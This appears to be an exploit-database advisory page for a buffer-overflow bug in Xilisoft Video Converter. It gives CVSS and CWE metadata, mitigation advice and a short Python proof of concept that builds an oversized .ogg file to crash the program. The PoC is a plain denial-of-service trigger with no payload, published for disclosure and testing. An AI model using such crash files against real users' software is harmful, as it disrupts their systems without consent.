header-logo
Suggest Exploit
vendor:
Xilisoft Video Converter
by:
Praveen Darshanam
7.5
CVSS
HIGH
Buffer-Overflow
119
CWE
Product Name: Xilisoft Video Converter
Affected Version From: 3.1.8.0720b
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: xilisoft_video_converter
Metasploit:
Other Scripts:
Platforms Tested:

Buffer-Overflow Vulnerability in Xilisoft Video Converter

The Xilisoft Video Converter is prone to a buffer-overflow vulnerability that allows attackers to execute arbitrary code in the context of the application. The vulnerability occurs due to the lack of adequate boundary checks on user-supplied data. A successful attack can result in a denial-of-service condition.

Mitigation:

Apply the latest security patches and updates from the vendor. Avoid opening suspicious files or visiting untrusted websites.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42473/info

Xilisoft Video Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Xilisoft Video Converter 3.1.8.0720b is vulnerable; other versions may also be affected. 

################PoC Start##############################################
print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"

#Download from
# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1
#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

buff = "D" * 8400

try:
    oggfile = open("XilVC_ogg_crash.ogg","w")
    oggfile.write(buff)
    oggfile.close()
    print "[+]Successfully created ogg file\n"
    print "[+]Coded by Praveen Darshanam\n"
except:
    print "[+]Cannot create File\n"

################PoC End################################################